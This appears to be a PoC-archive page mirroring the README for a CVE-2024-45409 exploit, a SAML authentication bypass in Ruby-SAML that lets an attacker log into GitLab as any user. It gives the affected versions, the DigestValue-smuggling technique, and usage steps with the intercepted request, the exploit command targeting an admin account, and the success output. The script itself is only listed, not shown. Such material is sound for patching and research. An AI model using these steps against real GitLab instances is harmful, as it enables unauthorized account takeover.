Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-45409 PoC — The Ruby SAML library vulnerable to a SAML authentication bypass via Incorrect XPath selector

Source
https://github.com/synacktiv/CVE-2024-45409
Associated Vulnerability
Title:The Ruby SAML library vulnerable to a SAML authentication bypass via Incorrect XPath selector (CVE-2024-45409)
Description:The Ruby SAML library is for implementing the client side of a SAML authorization. Ruby-SAML in <= 12.2 and 1.13.0 <= 1.16.0 does not properly verify the signature of the SAML Response. An unauthenticated attacker with access to any signed saml document (by the IdP) can thus forge a SAML Response/Assertion with arbitrary contents. This would allow the attacker to log in as arbitrary user within the vulnerable system. This vulnerability is fixed in 1.17.0 and 1.12.3.
Description
Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit
Readme
# Ruby-SAML / GitLab Authentication Bypass (CVE-2024-45409) exploit

This script exploits the [CVE-2024-45409](https://nvd.nist.gov/vuln/detail/CVE-2024-45409) that allows an unauthenticated attacker with access to any signed SAML document issued by the IDP to forge a SAML Response/Assertion and gain access as any user on GitLab. 

All the following GitLab (CE/EE) versions are vulnerable:
* < 16.11.10
* 17.0.0 < 17.0.8
* 17.0.0 < 17.1.8
* 17.0.0 < 17.2.7
* 17.0.0 < 17.3.3

This exploit injects the `DigestValue` of the modified assertion into the `StatusDetail` element, allowing it to smuggle the XPath selector that will use this value instead of the one in the `SignedInfo` block.

## Requirements

* A valid SAML Response issued by the IDP

## Usage

```bash
apt install python3-lxml
```

Intercept the URL and Base64-encoded IDP SAML response first, then modify the XML content using the script.

```http
POST /users/auth/saml/callback HTTP/1.1
Host: gitlab.test.local
[...]

SAMLResponse=PHNhbWxwOlJlc3Bv[...]
```

```bash
$ python3 CVE-2024-45409.py -r response.url_base64 -n admin@test.local -d -e -o response_patched.url_base64
[+] Parse response
	Digest algorithm: sha256
	Canonicalization Method: http://www.w3.org/2001/10/xml-exc-c14n#
[+] Remove signature from response
[+] Patch assertion ID
[+] Patch assertion NameID
[+] Patch assertion conditions
[+] Move signature in assertion
[+] Patch response ID
[+] Insert malicious reference
[+] Clone signature reference
[+] Create status detail element
[+] Patch digest value
[+] Write patched file in response_patched.url_base64
```

Afterward, replace the parameter `SAMLResponse` value with the script output. If authentication is successful, you will be redirected to the GitLab homepage.
```http
HTTP/1.1 302 Found
Location: http://gitlab.test.local/
[...]

<html><body>You are being <a href="http://gitlab.test.local/">redirected</a>.</body></html>
```

## References
* https://about.gitlab.com/releases/2024/09/17/patch-release-gitlab-17-3-3-released/
* https://github.com/advisories/GHSA-jw9c-mfg7-9rx2
* https://blog.projectdiscovery.io/ruby-saml-gitlab-auth-bypass/
* https://nvd.nist.gov/vuln/detail/CVE-2024-45409
* https://www.cvedetails.com/cve/CVE-2024-45409/
File Snapshot

 [4.0K]  /data/pocs/eea9123036b91b879134c37c516fde488bead185
├── [8.6K]  CVE-2024-45409.py
└── [2.2K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →